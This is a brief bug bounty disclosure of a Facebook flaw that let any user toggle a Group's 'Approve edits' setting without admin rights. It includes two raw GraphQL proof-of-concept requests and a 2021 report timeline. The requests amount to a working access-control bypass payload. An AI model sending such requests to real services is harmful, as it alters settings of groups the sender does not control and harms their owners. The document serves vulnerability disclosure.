[Facebook] Toggle "Approve edits" settings for any Group
By making two GraphQL calls, any Facebook user can toggle "Approve edits" settings for any Group without being an Admin, Moderator or even a member.
POC -
The request which turns ON -
-----------------------------------
POST /graphql HTTP/1.1
Host: graph.facebook.com
doc_id=3497359980371442&method=post&locale=en_US&pretty=false&format=json&variables={"input":{"post_edit_approval_setting":"REQUIRE_APPROVAL","group_id":"TARGET_GROUP_ID","actor_id":"ATTACKERS_USER_ID"}}
-----------------------------------
The request which turns OFF -
-----------------------------------
POST /graphql HTTP/1.1
Host: graph.facebook.com
doc_id=3497359980371442&method=post&locale=en_US&pretty=false&format=json&variables={"input":{"post_edit_approval_setting":"NO_APPROVAL","group_id":"TARGET_GROUP_ID","actor_id":"ATTACKERS_USER_ID"}}
-----------------------------------
Timeline -
Reported - Sunday, January 3, 2021
Marked as Duplicate - Friday, January 8, 2021